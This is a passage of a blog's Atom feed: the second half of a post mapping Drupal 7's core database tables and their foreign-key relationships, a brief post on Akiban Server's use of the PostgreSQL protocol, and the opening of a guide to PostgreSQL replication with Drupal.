    &lt;td&gt;cache_page&lt;/td&gt;&lt;td&gt;caches compressed pages served to anonymous users&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_path&lt;/td&gt;&lt;td&gt;caches path aliases&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;11 tables are created which do not relate to any other tables:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;actions&lt;/td&gt;&lt;td&gt;stores action information&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;batch&lt;/td&gt;&lt;td&gt;stores details about batches (processes that run in multiple HTTP requests)&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;blocked_ips&lt;/td&gt;&lt;td&gt;stores a list of blocked IP addresses&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;flood&lt;/td&gt;&lt;td&gt;controls the threshold of events, such as the number of contact attempts&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;queue&lt;/td&gt;&lt;td&gt;stores items in queues&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;rdf_mapping&lt;/td&gt;&lt;td&gt;stores custom RDF mappings for user-defined content types&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;semaphore&lt;/td&gt;&lt;td&gt;stores semaphores, locks, and flags&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;sequences&lt;/td&gt;&lt;td&gt;stores IDs&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;system&lt;/td&gt;&lt;td&gt;contains a list of all modules, themes, and theme engines that are or have been installed&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;url_alias&lt;/td&gt;&lt;td&gt;contains a list of URL aliases for Drupal paths&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;variable&lt;/td&gt;&lt;td&gt;stores variable/value pairs created by Drupal core or any other module or theme&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The 21 tables listed above are self-explanatory and I&amp;#8217;m not going to discuss them any further in this post. They are also independent in that they have no relationships with other tables.&lt;/p&gt;

&lt;h1 id='field_related_tables'&gt;Field Related Tables&lt;/h1&gt;

&lt;p&gt;There are 8 tables installed with core related to fields and field storage:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_data_body&lt;/td&gt;&lt;td&gt;stores details about the body field of an entity&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_revision_body&lt;/td&gt;&lt;td&gt;stores information about revisions to body fields&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_data_comment_body&lt;/td&gt;&lt;td&gt;stores information about comments associated with an entity&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_revision_comment_body&lt;/td&gt;&lt;td&gt;stores information about revisions to comments&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_data_field_image&lt;/td&gt;&lt;td&gt;stores information about images associated with an entity&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_revision_field_image&lt;/td&gt;&lt;td&gt;stores information about revisions to images&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_data_field_tags&lt;/td&gt;&lt;td&gt;stores information about tags associated with an entity&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_revision_field_tags&lt;/td&gt;&lt;td&gt;stores information about revisions to taxonomy terms/tags associated with an entity&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;While I was initially tempted to have these tables related to &lt;code&gt;node&lt;/code&gt;, that would not really be correct since these tables are related to an entity. In D7, entities can be other objects besides nodes, such as users or comments. The &lt;code&gt;entity_type&lt;/code&gt; column in these tables reflects that reality. These tables can be stored in other storage systems such as &lt;a href='http://drupal.org/project/mongodb'&gt;MongoDB&lt;/a&gt; due to the &lt;a href='http://api.drupal.org/api/drupal/modules%21field%21field.attach.inc/group/field_storage/7'&gt;field storage API&lt;/a&gt; introduced in Drupal 7.&lt;/p&gt;

&lt;p&gt;There are 2 other tables related to fields: &lt;code&gt;field_config&lt;/code&gt; and &lt;code&gt;field_config_instance&lt;/code&gt;. These tables store field configuration information. I believe a row in &lt;code&gt;field_config_instance&lt;/code&gt; cannot (well, at least &lt;em&gt;should&lt;/em&gt; not) exist without the corresponding &lt;code&gt;field_id&lt;/code&gt; in the &lt;code&gt;field_config&lt;/code&gt; table. Hence, the one-to-many relationship from &lt;code&gt;field_config&lt;/code&gt; to &lt;code&gt;field_config_instance&lt;/code&gt; is an identifying relationship.&lt;/p&gt;
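&lt;p&gt;For reference, the foreign key implied by that relationship would look something like the following; this is illustrative only, in the spirit of the gist linked above, and as noted there, actually adding such constraints to a live Drupal site would break things:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;-- illustrative only; Drupal core does not create this constraint
ALTER TABLE field_config_instance
  ADD CONSTRAINT field_config_instance_field_id_fk
  FOREIGN KEY (field_id) REFERENCES field_config (id);
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;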

&lt;h1 id='small_groups_of_tables'&gt;Small Groups of Tables&lt;/h1&gt;

&lt;p&gt;There are a number of groups you will notice in the full ER diagram that are made up of 2 to 3 tables. Zooming in on 4 of those groups, we can see those tables more clearly:&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/small_groups_zoom.png' alt='Zooming in on small groups.' /&gt;
&lt;/div&gt;
&lt;p&gt;One thing you will notice is that some relationships are shown with a solid line whereas others use a dotted line. MySQL Workbench represents identifying relationships with a solid line and non-identifying relationships with a dotted line. If you are unfamiliar with those terms, the standard definitions are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;identifying relationship - the foreign key attribute is part of the child&amp;#8217;s primary key.&lt;/li&gt;

&lt;li&gt;non-identifying relationship - the primary key attributes of the parent must not become primary key attributes of the child.&lt;/li&gt;
&lt;/ul&gt;
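&lt;p&gt;In SQL terms, the difference between the two looks like this (generic parent/child tables, not Drupal&amp;#8217;s):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;CREATE TABLE parent (id INT NOT NULL PRIMARY KEY);

-- identifying: the parent key is part of the child primary key
CREATE TABLE child_identifying (
  parent_id INT NOT NULL,
  seq       INT NOT NULL,
  PRIMARY KEY (parent_id, seq),
  FOREIGN KEY (parent_id) REFERENCES parent (id)
);

-- non-identifying: the parent key is just an ordinary attribute
CREATE TABLE child_non_identifying (
  id        INT NOT NULL PRIMARY KEY,
  parent_id INT NOT NULL,
  FOREIGN KEY (parent_id) REFERENCES parent (id)
);
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;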

&lt;p&gt;This &lt;a href='http://stackoverflow.com/questions/762937/whats-the-difference-between-identifying-and-non-identifying-relationships'&gt;stack overflow answer&lt;/a&gt; from &lt;a href='http://karwin.blogspot.com/'&gt;Bill Karwin&lt;/a&gt; contains a good discussion on these topics.&lt;/p&gt;

&lt;p&gt;Now let&amp;#8217;s discuss those groups in more detail.&lt;/p&gt;

&lt;h2 id='registry_group'&gt;Registry Group&lt;/h2&gt;

&lt;p&gt;I grouped the &lt;code&gt;registry&lt;/code&gt; and &lt;code&gt;registry_file&lt;/code&gt; tables together. These tables are used for implementing the code registry in Drupal. A one-to-many relationship exists from &lt;code&gt;registry_file&lt;/code&gt; to &lt;code&gt;registry&lt;/code&gt; and this relationship is an identifying relationship. A &lt;code&gt;filename&lt;/code&gt; that is not present in the &lt;code&gt;registry_file&lt;/code&gt; table should not appear in the &lt;code&gt;registry&lt;/code&gt; table.&lt;/p&gt;

&lt;h2 id='image_group'&gt;Image Group&lt;/h2&gt;

&lt;p&gt;I grouped the &lt;code&gt;image_styles&lt;/code&gt; and &lt;code&gt;image_effects&lt;/code&gt; tables together. These tables store configuration options for image styles and effects. A one-to-many relationship exists from &lt;code&gt;image_styles&lt;/code&gt; to &lt;code&gt;image_effects&lt;/code&gt; and this relationship is a non-identifying relationship.&lt;/p&gt;

&lt;h2 id='date_format_group'&gt;date_format Group&lt;/h2&gt;

&lt;p&gt;There are three tables about date formats in Drupal. &lt;code&gt;date_format_type&lt;/code&gt; is a lookup table that stores configured date format types. After a stock install of Drupal 7, three date format types exist:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;long&lt;/li&gt;

&lt;li&gt;medium&lt;/li&gt;

&lt;li&gt;short&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A one-to-many relationship exists from this lookup table to both &lt;code&gt;date_formats&lt;/code&gt; and &lt;code&gt;date_format_locale&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;In practice, this would be problematic. For example, a new date format can be created by an administrator. In D7, this results in the &lt;code&gt;system_date_format_save&lt;/code&gt; function being called. This function will insert a row in the &lt;code&gt;date_formats&lt;/code&gt; table that will not have a corresponding type (the type will be listed as custom).&lt;/p&gt;

&lt;p&gt;You will also notice the &lt;code&gt;locked&lt;/code&gt; column is redundant in the &lt;code&gt;date_formats&lt;/code&gt; table. I submitted a &lt;a href='http://drupal.org/node/1708464'&gt;patch&lt;/a&gt; to change this.&lt;/p&gt;

&lt;h2 id='file_group'&gt;File Group&lt;/h2&gt;

&lt;p&gt;I grouped the &lt;code&gt;file_managed&lt;/code&gt; and &lt;code&gt;file_usage&lt;/code&gt; tables into one group. These tables store information about uploaded files and information for tracking where a file is used.&lt;/p&gt;

&lt;p&gt;I believe a one-to-one relationship exists from &lt;code&gt;file_managed&lt;/code&gt; to &lt;code&gt;file_usage&lt;/code&gt; and that this is an identifying relationship.&lt;/p&gt;

&lt;h1 id='user_related_tables'&gt;User Related Tables&lt;/h1&gt;

&lt;p&gt;There are quite a few tables that store user related information. Below is a figure where I zoom in on those tables.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/all_user_tables.png' alt='User tables.' /&gt;
&lt;/div&gt;
&lt;p&gt;As you can see, the tables directly associated with users are &lt;code&gt;watchdog&lt;/code&gt;, &lt;code&gt;sessions&lt;/code&gt;, and &lt;code&gt;authmap&lt;/code&gt;. These tables are in a one-to-many relationship from &lt;code&gt;users&lt;/code&gt;. The functionality these tables provide is:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;authmap&lt;/td&gt;&lt;td&gt;stores distributed authentication mapping&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
&lt;td&gt;sessions&lt;/td&gt;&lt;td&gt;stores information about a user&amp;#8217;s session&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;watchdog&lt;/td&gt;&lt;td&gt;contains logs of all system events&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;There are then two tables that are in a many-to-many relationship with &lt;code&gt;users&lt;/code&gt; that link this table with other groups. One of these is the &lt;code&gt;users_roles&lt;/code&gt; table. This table links &lt;code&gt;users&lt;/code&gt; with &lt;code&gt;role&lt;/code&gt;. The &lt;code&gt;role&lt;/code&gt; table is then in a one-to-many relationship with the &lt;code&gt;role_permission&lt;/code&gt; table. The other many-to-many table is &lt;code&gt;shortcut_set_users&lt;/code&gt;. This table links &lt;code&gt;users&lt;/code&gt; with &lt;code&gt;shortcut_set&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The tables for the menu system are not really related to users but I placed the group close by since the &lt;code&gt;menu_links&lt;/code&gt; table maintains a one-to-many relationship with the &lt;code&gt;shortcut_set&lt;/code&gt; table. While the tables for the menu system do not appear to be related, I do believe a relationship exists there. In particular, I think that the &lt;code&gt;menu_links&lt;/code&gt; table has relationships to both the &lt;code&gt;menu_router&lt;/code&gt; and &lt;code&gt;menu_custom&lt;/code&gt; tables. The &lt;code&gt;router_path&lt;/code&gt; column in &lt;code&gt;menu_links&lt;/code&gt; could reference the &lt;code&gt;router&lt;/code&gt; column in &lt;code&gt;menu_router&lt;/code&gt; and the &lt;code&gt;menu_name&lt;/code&gt; column in &lt;code&gt;menu_links&lt;/code&gt; could reference the &lt;code&gt;menu_name&lt;/code&gt; in the &lt;code&gt;menu_custom&lt;/code&gt; table. Right now however, after a stock install of D7, a row with a menu name that is not present in &lt;code&gt;menu_custom&lt;/code&gt; will be created in &lt;code&gt;menu_links&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The menu system tables and a description of what they do is below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menu_custom&lt;/td&gt;&lt;td&gt;holds definitions for top-level custom menus&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menu_links&lt;/td&gt;&lt;td&gt;contains the individual links within a menu&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menu_router&lt;/td&gt;&lt;td&gt;maps paths to various callbacks&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
&lt;h1 id='node_related_tables'&gt;Node Related Tables&lt;/h1&gt;

&lt;p&gt;Node is one of the most central concepts in Drupal, so as you can imagine, many tables are related to that concept. First off, a high-level overview of the tables related to the &lt;code&gt;node&lt;/code&gt; table is shown below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/all_node_tables.png' alt='Node tables.' /&gt;
&lt;/div&gt;
&lt;p&gt;Tables that are directly related to &lt;code&gt;node&lt;/code&gt; are &lt;code&gt;node_revision&lt;/code&gt;, &lt;code&gt;node_access&lt;/code&gt;, and &lt;code&gt;node_type&lt;/code&gt;. The &lt;code&gt;node_type&lt;/code&gt; table is in a many-to-many relationship with &lt;code&gt;node&lt;/code&gt; and &lt;code&gt;block_node_type&lt;/code&gt;. &lt;code&gt;node_revision&lt;/code&gt; is in a many-to-one relationship with &lt;code&gt;node&lt;/code&gt;, as is &lt;code&gt;node_access&lt;/code&gt;. The &lt;code&gt;node_access&lt;/code&gt; table has only one row upon initial installation and references a non-existent node. An &lt;a href='http://drupal.org/node/1703222'&gt;issue&lt;/a&gt; has been created to address this.&lt;/p&gt;

&lt;p&gt;The tables directly related to &lt;code&gt;node&lt;/code&gt; and a description of what they do is below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;node_access&lt;/td&gt;&lt;td&gt;identifies which realm/grant pairs a user must possess in order to view, update, or delete specific nodes&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;node_revision&lt;/td&gt;&lt;td&gt;stores information about each saved version of a node&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;node_type&lt;/td&gt;&lt;td&gt;stores information about all defined node types&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
&lt;h2 id='taxonomy_tables'&gt;Taxonomy Tables&lt;/h2&gt;

&lt;p&gt;Four tables in the stock schema are related to taxonomy. These tables are shown in the figure below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/taxonomy_tables.png' alt='Taxonomy tables.' /&gt;
&lt;/div&gt;
&lt;p&gt;First of all, the &lt;code&gt;taxonomy_index&lt;/code&gt; table is in a many-to-many relationship with the &lt;code&gt;node&lt;/code&gt; and &lt;code&gt;taxonomy_term_data&lt;/code&gt; tables. The &lt;code&gt;taxonomy_vocabulary&lt;/code&gt; table has a one-to-many relationship with the &lt;code&gt;taxonomy_term_data&lt;/code&gt; table. The &lt;code&gt;taxonomy_term_data&lt;/code&gt; table in turn has two one-to-many relationships with the &lt;code&gt;taxonomy_term_hierarchy&lt;/code&gt; table.&lt;/p&gt;

&lt;p&gt;A description of the taxonomy tables is given below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;taxonomy_index&lt;/td&gt;&lt;td&gt;maintains de-normalized information about node/term relationships&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;taxonomy_term_data&lt;/td&gt;&lt;td&gt;stores term information&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;taxonomy_term_hierarchy&lt;/td&gt;&lt;td&gt;stores the hierarchical relationship between terms&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;taxonomy_vocabulary&lt;/td&gt;&lt;td&gt;stores vocabulary information&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
&lt;h2 id='block_tables'&gt;Block Tables&lt;/h2&gt;

&lt;p&gt;The main table in this group is &lt;code&gt;block&lt;/code&gt;. It has three directly related tables in one-to-many relationships: &lt;code&gt;block_node_type&lt;/code&gt;, &lt;code&gt;block_role&lt;/code&gt;, and &lt;code&gt;block_custom&lt;/code&gt;.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/blocks_tables.png' alt='Blocks tables.' /&gt;
&lt;/div&gt;
&lt;p&gt;A description of the blocks tables is given below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
&lt;td&gt;block&lt;/td&gt;&lt;td&gt;stores block settings&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;block_custom&lt;/td&gt;&lt;td&gt;stores the contents of custom-made blocks&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;block_node_type&lt;/td&gt;&lt;td&gt;stores information that sets up display criteria for blocks based on content type&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;block_role&lt;/td&gt;&lt;td&gt;stores access permissions for blocks based on user roles&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
&lt;h2 id='search_tables'&gt;Search Tables&lt;/h2&gt;

&lt;p&gt;I am a little unsure of the relationships for the search tables. I believe they are as shown in the figure below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/search_tables.png' alt='Search tables.' /&gt;
&lt;/div&gt;
&lt;p&gt;The relationship I&amp;#8217;m most unsure of here is the one between &lt;code&gt;search_total&lt;/code&gt; and &lt;code&gt;search_index&lt;/code&gt;. I don&amp;#8217;t think the one-to-many relationship I have in place from &lt;code&gt;search_total&lt;/code&gt; to &lt;code&gt;search_index&lt;/code&gt; is correct.&lt;/p&gt;

&lt;p&gt;A description of the search tables is given below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;search_dataset&lt;/td&gt;&lt;td&gt;stores items that will be searched&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;search_index&lt;/td&gt;&lt;td&gt;stores the search index and associates words, items, and scores&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;search_node_links&lt;/td&gt;&lt;td&gt;stores items that link to other nodes&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;search_total&lt;/td&gt;&lt;td&gt;stores search totals for words&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
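&lt;p&gt;For what it&amp;#8217;s worth, as far as I can tell core&amp;#8217;s search query joins these two tables on the shared &lt;code&gt;word&lt;/code&gt; column, so the link is word-based rather than key-based. A rough sketch of that ranking join (not the verbatim core query):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;-- rank items matching a word: per-item scores from search_index
-- weighted by the global word statistics kept in search_total
SELECT i.type, i.sid, SUM(i.score * t.count) AS calculated_score
FROM search_index i
JOIN search_total t ON t.word = i.word
WHERE i.word = &amp;#39;drupal&amp;#39;
GROUP BY i.type, i.sid;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;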
&lt;h1 id='tables_that_relate_nodes_to_users'&gt;Tables That Relate Nodes to Users&lt;/h1&gt;

&lt;p&gt;There are three tables in many-to-many relationships between &lt;code&gt;node&lt;/code&gt; and &lt;code&gt;users&lt;/code&gt;:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;comment&lt;/td&gt;&lt;td&gt;stores comments and associated data&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;history&lt;/td&gt;&lt;td&gt;stores a record of which users have read which nodes&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;node_comment_statistics&lt;/td&gt;&lt;td&gt;maintains statistics of node and comment posts to show the &lt;b&gt;new&lt;/b&gt; and &lt;b&gt;updated&lt;/b&gt; flags&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The &lt;code&gt;comment&lt;/code&gt; table could arguably form its own group. I decided against doing that in this ER diagram since it would have been a group containing a single table. Logically, I think of it as belonging to either the &lt;code&gt;users&lt;/code&gt; or &lt;code&gt;node&lt;/code&gt; group.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;node_comment_statistics&lt;/code&gt; also maintains a relationship with &lt;code&gt;comment&lt;/code&gt;. This is a non-identifying relationship since a node can exist without any comments.&lt;/p&gt;
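&lt;p&gt;As an example of how one of these junction tables is used, here is a small sketch (assuming the stock column names) that uses &lt;code&gt;history&lt;/code&gt; to list the nodes a given user has read:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;-- nodes user 1 has read, most recently viewed first
SELECT n.title, h.timestamp
FROM history h
JOIN node n ON n.nid = h.nid
WHERE h.uid = 1
ORDER BY h.timestamp DESC;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;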

&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;During this work, I noticed that the column definitions for many foreign key relationships are incorrect, which would result in MySQL not allowing these constraints to actually be created. I created an &lt;a href='http://drupal.org/node/1701822'&gt;issue&lt;/a&gt; and patch for this, but it turns out Liam Morland is working on &lt;a href='http://drupal.org/node/911352'&gt;using foreign keys&lt;/a&gt; in core and came across the same problem around the same time as me.&lt;/p&gt;
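&lt;p&gt;To illustrate the kind of failure I mean, here is a hypothetical pair of tables (not from the Drupal schema) where the column definitions disagree, so InnoDB refuses to create the constraint:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;-- hypothetical illustration: the referencing column must match the
-- referenced column&amp;#39;s type, including signedness, or InnoDB
-- rejects the table definition (errno 150)
CREATE TABLE parent (id INT NOT NULL PRIMARY KEY) ENGINE=InnoDB;
CREATE TABLE child (
  parent_id INT UNSIGNED,
  FOREIGN KEY (parent_id) REFERENCES parent (id)
) ENGINE=InnoDB;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;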

&lt;p&gt;Other issues I encountered have also been logged by Liam:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;the &lt;code&gt;node_access&lt;/code&gt; table references a non-existent node (&lt;a href='http://drupal.org/node/1703222'&gt;relevant issue&lt;/a&gt;)&lt;/li&gt;

&lt;li&gt;a set name exists in &lt;code&gt;shortcut_set&lt;/code&gt; that does not exist in &lt;code&gt;menu_links&lt;/code&gt; (&lt;a href='http://drupal.org/node/1703208'&gt;relevant issue&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I would vote for foreign keys being used in Drupal core for a number of reasons, not least of which is that foreign keys help a newcomer trying to understand the schema installed by Drupal.&lt;/p&gt;

&lt;p&gt;As I mentioned at the beginning of this post, any comments or corrections are very much welcome. I hope this information can prove useful to someone else besides me!&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>PostgreSQL Protocol in Akiban Server</title>
   <link href="http://posulliv.github.com/2012/07/23/postgres-akiban"/>
   <updated>2012-07-23T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/07/23/postgres-akiban</id>
   <content type="html">&lt;p&gt;Last week I was at &lt;a href='http://www.oscon.com/oscon2012'&gt;OSCON&lt;/a&gt; with &lt;a href='http://www.akiban.com/'&gt;Akiban&lt;/a&gt; where I did a demo during &lt;a href='http://renormalize.org/'&gt;Ori&amp;#8217;s&lt;/a&gt; &lt;a href='http://www.oscon.com/oscon2012/public/schedule/detail/26439'&gt;talk&lt;/a&gt;. We announced our &lt;a href='http://www.akiban.com/download-akiban-server'&gt;early developer release&lt;/a&gt; at OSCON and it was a lot of fun to be able to show people our product at our booth. It was also satisfying to see users download and try out the product we&amp;#8217;ve been working on. I&amp;#8217;m hoping our &lt;a href='http://launchpad.net/akiban'&gt;source code&lt;/a&gt; will also be made publically available in the near future.&lt;/p&gt;

&lt;p&gt;One of the common questions we got during the conference was why we implemented the PostgreSQL protocol. Some people were also confused by this and thought we were a fork of PostgreSQL. Akiban Server is a completely independent database server we&amp;#8217;ve built from the ground up, and when it came time to decide on a communication protocol, we decided that the PostgreSQL protocol was the best choice.&lt;/p&gt;

&lt;p&gt;The main reasons we chose the PostgreSQL protocol are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;the protocol is pretty simple and well &lt;a href='http://www.postgresql.org/docs/9.1/static/protocol.html'&gt;documented&lt;/a&gt;&lt;/li&gt;

&lt;li&gt;many clients exist for PostgreSQL and can be re-used with Akiban (this means we do not have to spend a lot of time on client drivers)&lt;/li&gt;

&lt;li&gt;the PostgreSQL command line tool and client library ship with OS X by default now (making playing with our server much easier)&lt;/li&gt;

&lt;li&gt;it supports asynchronous operations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We (really, when I say we, I mean &lt;a href='http://www.akiban.com/profile/mike-mcmahon'&gt;Mike&lt;/a&gt;) also implemented support for a number of PostgreSQL system tables by creating views internally, in order to support many of the &lt;code&gt;\d&lt;/code&gt; commands in &lt;code&gt;psql&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;If you are interested in trying it out, I encourage you to download our server and start playing with it. Try using your favorite PostgreSQL tools with it and see if they break. We are very interested in any and all feedback!&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Configuring Drupal 7.x With PostgreSQL Replication</title>
   <link href="http://posulliv.github.com/2012/07/08/drupal-postgres-replication"/>
   <updated>2012-07-08T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/07/08/drupal-postgres-replication</id>
   <content type="html">&lt;p&gt;One of the new features in Drupal 7 is that it supports sending queries to a read-only slave database. Since version 9.0, PostgreSQL supports replication natively. In this post, I wanted to cover how to configure replication in PostgreSQL and have Drupal make use of a slave. I will use the master/slave terminology that is common in the MySQL world when referring to the master (primary) and slave (standby) servers in this post.&lt;/p&gt;

&lt;p&gt;First, I installed PostgreSQL 9.1 on my master server along with Drupal 7.12. The steps taken to install and configure Drupal with PostgreSQL 9.1 on my master server are outlined in this &lt;a href='https://gist.github.com/3012400'&gt;gist&lt;/a&gt;. Then I installed PostgreSQL 9.1 on another server that will serve as a slave. My initial setup on the slave was quite simple and only involved a basic install. The following commands were all I executed on the slave server to get a base PostgreSQL install:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install python-software-properties&lt;/span&gt;
&lt;span class='go'&gt;sudo add-apt-repository ppa:pitti/postgresql&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get update&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install postgresql-9.1 libpq-dev postgresql-contrib-9.1&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once the basic Drupal install was up and running on the master and the slave server has a basic PostgreSQL install, I started on configuring replication. Replication in general is documented in depth in the online PostgreSQL &lt;a href='http://www.postgresql.org/docs/9.1/static/warm-standby.html'&gt;documentation&lt;/a&gt;. In this post, I will be configuring streaming replication which allows a slave server to service read queries.&lt;/p&gt;

&lt;p&gt;The steps that need to be performed to configure streaming replication are (I will cover how to perform each step):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;create a replication user for slaves to connect with&lt;/li&gt;

&lt;li&gt;enable continuous archiving on the master&lt;/li&gt;

&lt;li&gt;configure the master to allow remote connections with the replication user&lt;/li&gt;

&lt;li&gt;take a base backup to be used for setting up a slave&lt;/li&gt;
